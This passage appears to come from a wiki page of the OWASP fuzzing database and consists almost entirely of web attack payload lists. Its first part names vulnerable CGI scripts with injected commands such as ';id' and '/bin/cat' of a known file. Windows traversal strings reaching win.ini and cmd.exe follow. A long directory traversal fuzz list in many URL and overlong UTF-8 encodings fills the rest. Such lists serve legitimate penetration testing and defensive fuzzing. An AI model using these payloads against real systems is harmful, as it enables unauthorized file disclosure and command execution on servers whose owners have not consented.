webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
webutil.pl&lt;br /&gt;
webutils.pl&lt;br /&gt;
webwho.pl&lt;br /&gt;
where.pl?sd=ls%20/etc&lt;br /&gt;
whois.cgi?action=load&amp;amp;whois=%3Bid&lt;br /&gt;
whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois/whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}&lt;br /&gt;
windmail&lt;br /&gt;
wrap&lt;br /&gt;
wrap.cgi&lt;br /&gt;
ws_ftp.ini&lt;br /&gt;
www-sql&lt;br /&gt;
wwwadmin.pl&lt;br /&gt;
wwwboard.cgi.cgi&lt;br /&gt;
wwwboard.pl&lt;br /&gt;
wwwstats.pl&lt;br /&gt;
wwwthreads/3tvars.pm&lt;br /&gt;
wwwthreads/w3tvars.pm&lt;br /&gt;
wwwwais&lt;br /&gt;
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
zsh&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Windows Directory Traversal   (Update: 17 March 2010  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Windows Directory Traversal   (Update: 17 March 2010&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Generic 8 Directory Deep Traversal Fuzz (17 March 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Generic 8 Directory Deep Traversal Fuzz (17 March 2010) &lt;br /&gt;
# Derived from the awesome &amp;quot;Directory Traversal Fuzzing Code&amp;quot; v0.2 by Luca Carettoni&lt;br /&gt;
# Did some cleanup &amp;amp; removed anything to the right of {FILE} for inclusion in a&lt;br /&gt;
# separate fuzzfile for more flexibiity, for the OWASP Fuzzing Code Database. &lt;br /&gt;
# adam.muntner@uietmove.com &lt;br /&gt;
&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
